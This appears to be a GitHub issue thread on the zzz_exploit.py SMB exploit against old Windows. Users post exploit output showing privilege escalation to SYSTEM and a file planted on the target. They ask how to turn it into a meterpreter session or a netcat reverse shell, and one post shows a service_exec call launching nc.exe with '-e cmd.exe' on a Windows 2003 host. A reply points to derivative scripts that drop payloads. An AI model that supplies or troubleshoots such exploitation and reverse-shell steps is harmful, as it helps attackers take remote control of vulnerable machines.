zzz_exploit.py: I have this result but...
kalifan opened this issue · 6 comments
The exploit is working fine, but I don't understand how it works to complete the process and get a meterpreter session.
Target OS: Windows 5.1
Using named pipe: spoolss
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x84927da8
SESSION: 0xe2b8b190
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe3693030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe36930d0
overwriting token UserAndGroups
creating file c:\pwned.txt on the target
Done
Can someone help me? Thanks.
I tried it in the LAN and it works fine; maybe in the WAN it does not work fine. Maybe it is AV, I don't know.
No support issue
On the same note: I have copied nc.exe onto Windows 2003 using the python script. Now I want to invoke nc.exe using service_exec(conn, r'cmd /c c:\nc.exe'). How do I go about that?
I also tried service_exec(conn, r'cmd /c c:\nc.exe c:\nc.exe -e cmd.exe '), still not getting a reverse shell.
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1088b18
userAndGroupCount: 0x5
userAndGroupsAddr: 0xe1088bb8
overwriting token UserAndGroups
copying shell file c:\nc.exe on the target
Done

There are already new scripts for SMB exploitation on the web that drop a payload to the victims and execute it, and then return a meterpreter session to you, which is much simpler.
Those scripts are based on this one here with a few changes; search for it on GitHub.